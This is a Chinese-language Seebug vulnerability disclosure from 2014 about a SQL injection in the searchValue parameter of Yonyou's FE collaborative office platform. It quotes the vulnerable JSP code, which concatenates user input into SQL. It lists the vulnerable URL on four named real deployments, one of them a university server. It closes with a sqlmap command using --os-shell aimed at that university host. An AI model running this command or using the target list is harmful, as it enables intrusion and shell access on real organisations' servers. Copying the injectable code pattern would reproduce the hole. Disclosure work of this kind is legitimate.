用友某系统存在通用SQL注入

2014-05-26T00:00:00
ID SSV:93254
Type seebug
Reporter Root
Modified 2014-05-26T00:00:00

Description

简要描述:

用友某系统存在通用SQL注入

详细说明:

用友FE协作办公平台最新版 漏洞url:

/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

部分代码

<% // String searchValue=HtmlFormat.format(request.getParameter("searchValue"));//这个参数 String filter=""; Dao dao=(Dao)ResourceManage.getContext("basicDao"); FieldSet groupFs=dao.getFieldSetByFilter("SYS_GROUP","SG04='/'"); String groupName=groupFs.getString("SG03"); DataTable dataTable=null; if(!"".equals(roleId)){ if(!groupName.equals(dept)) filter=" and su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ; else filter=" su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ; } if(!"".equals(searchValue)){ filter=filter+" and (su02 like '%"+searchValue+"%' or SU01 like '%"+searchValue+"%')"; } if(!groupName.equals(dept)){ dataTable=dao.getDataTable("GROUP_USER_V"," sg03='"+dept+"'"+filter,"gu03"); } else{ dataTable=dao.getDataTable("SYS_USERS",filter,"SU03"); } %>

其中searchValue存在注入。 证明:

http://oa.jiada.cc:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

<img src="https://images.seebug.org/upload/201405/241733258756c2bf77141956cff60c197e375b52.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

http://oa.shunhengli.com:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

<img src="https://images.seebug.org/upload/201405/24173758a611e2fcec3258a16170d4881448a19c.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">

http://oa.nbsec.org:9090//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

<img src="https://images.seebug.org/upload/201405/241739581865494dc9783e20e373f9b12a6df0bc.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">

http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3

<img src="https://images.seebug.org/upload/201405/2417423850a0f5159e9947c8274999b3ec4c0e19.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">

漏洞证明:

sqlmap -u "http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3" -p searchValue --os-shell

<img src="https://images.seebug.org/upload/201405/24174518c95eb06c33dcf401c4d79d45f8088b20.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">